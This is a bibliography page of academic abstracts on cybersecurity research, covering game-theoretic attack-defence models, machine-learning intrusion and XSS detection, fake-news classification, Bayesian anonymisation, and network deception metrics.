Biblio
The security problem of networked control systems (NCSs) suffering denial of service(DoS) attacks with incomplete information is investigated in this paper. Data transmission among different components in NCSs may be blocked due to DoS attacks. We use the concept of security level to describe the degree of security of different components in an NCS. Intrusion detection system (IDS) is used to monitor the invalid data generated by DoS attacks. At each time slot, the defender considers which component to monitor while the attacker considers which place for invasion. A one-shot game between attacker and defender is built and both the complete information case and the incomplete information case are considered. Furthermore, a repeated game model with updating beliefs is also established based on the Bayes' rule. Finally, a numerical example is provided to illustrate the effectiveness of the proposed method.
Intrusion detection is one of the most prominent and challenging problem faced by cybersecurity organizations. Intrusion Detection System (IDS) plays a vital role in identifying network security threats. It protects the network for vulnerable source code, viruses, worms and unauthorized intruders for many intranet/internet applications. Despite many open source APIs and tools for intrusion detection, there are still many network security problems exist. These problems are handled through the proper pre-processing, normalization, feature selection and ranking on benchmark dataset attributes prior to the enforcement of self-learning-based classification algorithms. In this paper, we have performed a comprehensive comparative analysis of the benchmark datasets NSL-KDD and CIDDS-001. For getting optimal results, we have used the hybrid feature selection and ranking methods before applying self-learning (Machine / Deep Learning) classification algorithmic approaches such as SVM, Naïve Bayes, k-NN, Neural Networks, DNN and DAE. We have analyzed the performance of IDS through some prominent performance indicator metrics such as Accuracy, Precision, Recall and F1-Score. The experimental results show that k-NN, SVM, NN and DNN classifiers perform approx. 100% accuracy regarding performance evaluation metrics on the NSL-KDD dataset whereas k-NN and Naïve Bayes classifiers perform approx. 99% accuracy on the CIDDS-001 dataset.
Cross-Site Scripting (XSS) is an attack most often carried out by attackers to attack a website by inserting malicious scripts into a website. This attack will take the user to a webpage that has been specifically designed to retrieve user sessions and cookies. Nearly 68% of websites are vulnerable to XSS attacks. In this study, the authors conducted a study by evaluating several machine learning methods, namely Support Vector Machine (SVM), K-Nearest Neighbour (KNN), and Naïve Bayes (NB). The machine learning algorithm is then equipped with the n-gram method to each script feature to improve the detection performance of XSS attacks. The simulation results show that the SVM and n-gram method achieves the highest accuracy with 98%.
Designing a machine learning based network intrusion detection system (IDS) with high-dimensional features can lead to prolonged classification processes. This is while low-dimensional features can reduce these processes. Moreover, classification of network traffic with imbalanced class distributions has posed a significant drawback on the performance attainable by most well-known classifiers. With the presence of imbalanced data, the known metrics may fail to provide adequate information about the performance of the classifier. This study first uses Principal Component Analysis (PCA) as a feature dimensionality reduction approach. The resulting low-dimensional features are then used to build various classifiers such as Random Forest (RF), Bayesian Network, Linear Discriminant Analysis (LDA) and Quadratic Discriminant Analysis (QDA) for designing an IDS. The experimental findings with low-dimensional features in binary and multi-class classification show better performance in terms of Detection Rate (DR), F-Measure, False Alarm Rate (FAR), and Accuracy. Furthermore, in this paper, we apply a Multi-Class Combined performance metric Combi ned Mc with respect to class distribution through incorporating FAR, DR, Accuracy, and class distribution parameters. In addition, we developed a uniform distribution based balancing approach to handle the imbalanced distribution of the minority class instances in the CICIDS2017 network intrusion dataset. We were able to reduce the CICIDS2017 dataset's feature dimensions from 81 to 10 using PCA, while maintaining a high accuracy of 99.6% in multi-class and binary classification.
In this paper, a novel anti-jamming mechanism is proposed to analyze and enhance the security of adversarial Internet of Battlefield Things (IoBT) systems. In particular, the problem is formulated as a dynamic psychological game between a soldier and an attacker. In this game, the soldier seeks to accomplish a time-critical mission by traversing a battlefield within a certain amount of time, while maintaining its connectivity with an IoBT network. The attacker, on the other hand, seeks to find the optimal opportunity to compromise the IoBT network and maximize the delay of the soldier's IoBT transmission link. The soldier and the attacker's psychological behavior are captured using tools from psychological game theory, with which the soldier's and attacker's intentions to harm one another are considered in their utilities. To solve this game, a novel learning algorithm based on Bayesian updating is proposed to find an ∈ -like psychological self-confirming equilibrium of the game.
This paper describes a machine assistance approach to grading decisions for values that might be missing or need validation, using a mathematical algebraic form of an Expert System, instead of the traditional textual or logic forms and builds a neural network computational graph structure. This Experts System approach is also structured into a neural network like format of: input, hidden and output layers that provide a structured approach to the knowledge-base organization, this provides a useful abstraction for reuse for data migration applications in big data, Cyber and relational databases. The approach is further enhanced with a Bayesian probability tree approach to grade the confidences of value probabilities, instead of the traditional grading of the rule probabilities, and estimates the most probable value in light of all evidence presented. This is ground work for a Machine Learning (ML) experts system approach in a form that is closer to a Neural Network node structure.
Cloud systems are becoming more complex and vulnerable to attacks. Cyber attacks are also becoming more sophisticated and harder to detect. Therefore, it is increasingly difficult for a single cloud-based intrusion detection system (IDS) to detect all attacks, because of limited and incomplete knowledge about attacks. The recent researches in cyber-security have shown that a co-operation among IDSs can bring higher detection accuracy in such complex computer systems. Through collaboration, a cloud-based IDS can consult other IDSs about suspicious intrusions and increase the decision accuracy. The problem of existing cooperative IDS approaches is that they overlook having untrusted (malicious or not) IDSs that may negatively effect the decision about suspicious intrusions in the cloud. Moreover, they rely on a centralized architecture in which a central agent regulates the cooperation, which contradicts the distributed nature of the cloud. In this paper, we propose a framework that enables IDSs to distributively form trustworthy IDSs communities. We devise a novel decentralized algorithm, based on coalitional game theory, that allows a set of cloud-based IDSs to cooperatively set up their coalition in such a way to make their individual detection accuracy increase, even in the presence of untrusted IDSs.
Intentionally deceptive content presented under the guise of legitimate journalism is a worldwide information accuracy and integrity problem that affects opinion forming, decision making, and voting patterns. Most so-called `fake news' is initially distributed over social media conduits like Facebook and Twitter and later finds its way onto mainstream media platforms such as traditional television and radio news. The fake news stories that are initially seeded over social media platforms share key linguistic characteristics such as making excessive use of unsubstantiated hyperbole and non-attributed quoted content. In this paper, the results of a fake news identification study that documents the performance of a fake news classifier are presented. The Textblob, Natural Language, and SciPy Toolkits were used to develop a novel fake news detector that uses quoted attribution in a Bayesian machine learning system as a key feature to estimate the likelihood that a news article is fake. The resultant process precision is 63.333% effective at assessing the likelihood that an article with quotes is fake. This process is called influence mining and this novel technique is presented as a method that can be used to enable fake news and even propaganda detection. In this paper, the research process, technical analysis, technical linguistics work, and classifier performance and results are presented. The paper concludes with a discussion of how the current system will evolve into an influence mining system.
Identifying cyberattack vectors on cyber supply chains (CSC) in the event of cyberattacks are very important in mitigating cybercrimes effectively on Cyber Physical Systems CPS. However, in the cyber security domain, the invincibility nature of cybercrimes makes it difficult and challenging to predict the threat probability and impact of cyber attacks. Although cybercrime phenomenon, risks, and treats contain a lot of unpredictability's, uncertainties and fuzziness, cyberattack detection should be practical, methodical and reasonable to be implemented. We explore Bayesian Belief Networks (BBN) as knowledge representation in artificial intelligence to be able to be formally applied probabilistic inference in the cyber security domain. The aim of this paper is to use Bayesian Belief Networks to detect cyberattacks on CSC in the CPS domain. We model cyberattacks using DAG method to determine the attack propagation. Further, we use a smart grid case study to demonstrate the applicability of attack and the cascading effects. The results show that BBN could be adapted to determine uncertainties in the event of cyberattacks in the CSC domain.
We present a novel, and use case agnostic method of identifying and circumventing private data exposure across distributed and high-dimensional data repositories. Examples of distributed high-dimensional data repositories include medical research and treatment data, where oftentimes more than 300 describing attributes appear. As such, providing strong guarantees of data anonymity in these repositories is a hard constraint in adhering to privacy legislation. Yet, when applied to distributed high-dimensional data, existing anonymisation algorithms incur high levels of information loss and do not guarantee privacy defeating the purpose of anonymisation. In this paper, we address this issue by using Bayesian networks to handle data transformation for anonymisation. By evaluating every attribute combination to determine the privacy exposure risk, the conditional probability linking attribute pairs is computed. Pairs with a high conditional probability expose the risk of deanonymisation similar to quasi-identifiers and can be separated instead of deleted, as in previous algorithms. Attribute separation removes the risk of privacy exposure, and deletion avoidance results in a significant reduction in information loss. In other words, assimilating the conditional probability of outliers directly in the adjacency matrix in a greedy fashion is quick and thwarts de-anonymisation. Since identifying every privacy violating attribute combination is a W[2]-complete problem, we optimise the procedure with a multigrid solver method by evaluating the conditional probabilities between attribute pairs, and aggregating state space explosion of attribute pairs through manifold learning. Finally, incremental processing of new data is achieved through inexpensive, continuous (delta) learning.
The reliability of nuclear command, control and communications has long been identified as a critical component of the strategic stability among nuclear states. Advances in offensive cyber weaponry have the potential to negatively impact this reliability, threatening strategic stability. In this paper we present a game theoretic model of preemptive cyber attacks against nuclear command, control and communications. The model is a modification of the classic two-player game of Chicken, a standard game theoretic model for nuclear brinksmanship. We fully characterize equilibria in both the complete information game and two distinct two-sided incomplete information games. We show that when both players have advanced cyber capabilities conflict is more likely in equilibrium, regardless of information structure. On the other hand, when at most one player has advanced cyber capabilities, strategic stability depends on the information structure. Under complete information, asymmetric cyber capabilities have a stabilizing effect in which the player with strong cyber has the resolve to stand firm in equilibrium. Under incomplete information, asymmetric cyber capabilities can have both stabilizing and destabilizing effects depending on prior beliefs over opponent cyber capabilities.
Cyber reconnaissance is the process of gathering information about a target network for the purpose of compromising systems within that network. Network-based deception has emerged as a promising approach to disrupt attackers' reconnaissance efforts. However, limited work has been done so far on measuring the effectiveness of network-based deception. Furthermore, given that Software-Defined Networking (SDN) facilitates cyber deception by allowing network traffic to be modified and injected on-the-fly, understanding the effectiveness of employing different cyber deception strategies is critical. In this paper, we present a model to study the reconnaissance surface of a network and model the process of gathering information by attackers as interactions with a cyber defensive system that may use deception. To capture the evolution of the attackers' knowledge during reconnaissance, we design a belief system that is updated by using a Bayesian inference method. For the proposed model, we present two metrics based on KL-divergence to quantify the effectiveness of network deception. We tested the model and the two metrics by conducting experiments with a simulated attacker in an SDN-based deception system. The results of the experiments match our expectations, providing support for the model and proposed metrics.